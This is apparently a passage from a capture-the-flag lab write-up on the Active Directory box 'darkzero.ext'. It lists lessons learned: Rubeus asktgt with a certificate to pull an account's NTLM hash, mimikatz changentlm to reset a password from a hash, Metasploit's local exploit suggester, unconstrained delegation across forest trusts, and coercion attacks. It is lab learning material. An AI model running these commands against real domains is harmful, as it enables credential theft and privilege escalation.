```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
certutil -f -decode .\base64.txt .\cert.pfx
```

Now, we can use Rubeus's asktgt module to extract the user's NTLM hash using the `/getcredentials` flag:

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
.\Rubeus.exe asktgt /user:svc_sql /domain:darkzero.ext /dc:dc02.darkzero.ext /certificate:.\cert.pfx /getcredentials
```

#### 4. Using Regex with Certify & Rubeus Output to extract Base64 values

We can use Regex to extract only the Base64 value from the output:

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
type output.txt | findstr /R "^[A-Za-z0-9+/=][A-Za-z0-9+/=]*$" > .\base64.txt
```

We then decode the base64 string to extract the output in binary form:

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
certutil -f -decode .\base64.txt .\cert.pfx
```

#### 5. Changing Password with NTLM using Mimikatz

We can use `mimikatz`'s `lsadump::changentlm` module to change our password using the NLTM hash: [changentlm | The Hacker Tools](https://tools.thehacker.recipes/mimikatz/modules/lsadump/changentlm)

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
.\mimikatz.exe "lsadump::changentlm /server:<FQDN_of_DC> /user:<username> /old:<NT Hash> /newpassword:P@ss1234" "End"
```

#### 6. Enumerate Windows Kernel Local Privilege Escalation (LPE) vulnerabilities

With Meterpreter shell, we can run `post/multi/recon/local_exploit_suggester` to check for all local privilege escalation vulnerabilities in Metasploit.

#### 7. Unconstrained Delegation

For 2-way Cross Forest Trusts, we can abuse Unconstrained Delegation to obtain the TGT of another domain's DC.

* Basically we run a listener on our controlled DC, and force the target DC in the other forest to authenticate to our controlled DC. Since 2-way cross forest trusts are established, the target DC will authenticate to us using the same TGT that it will be using in it's own forest. By capture the TGT, we can authenticate to the target forest as the target DC.

#### 8. Run all Coercion Attacks

Always run all different coercion attacks when trying to trigger force authentication. Attacks like SpoolSample will not work if there is no printspooler service running on the machine.

## Tags

***

### Initial Access

[#MSSQL](/tags/MSSQL) [#Linked\_Servers](/tags/Linked_Servers) [#SQL](/tags/SQL) [#Ligolo](/tags/Ligolo) [#Service\_Account](/tags/Service_Account) [#Logon\_Type](/tags/Logon_Type) [#Windows\_Privilege](/tags/Windows_Privilege) [#Restore\_Privileges](/tags/Restore_Privileges) [#Changing\_Passwords](/tags/Changing_Passwords) [#NTLM](/tags/NTLM) [#Kerberos](/tags/Kerberos) [#Token\_Impersonation](/tags/Token_Impersonation) [#ADCS](/tags/ADCS) [#Potato\_Attacks](/tags/Potato_Attacks) [#Kernel\_Exploit](/tags/Kernel_Exploit) [#ActiveDirectory](/tags/ActiveDirectory) [#Regex](/tags/Regex)

### Privilege Escalation

[#Unconstrained\_Delegation](/tags/Unconstrained_Delegation) [#Forest\_Trust](/tags/Forest_Trust) [#Coersion\_Attacks](/tags/Coersion_Attacks) [#Kerberos](/tags/Kerberos) [#DCSync](/tags/DCSync)
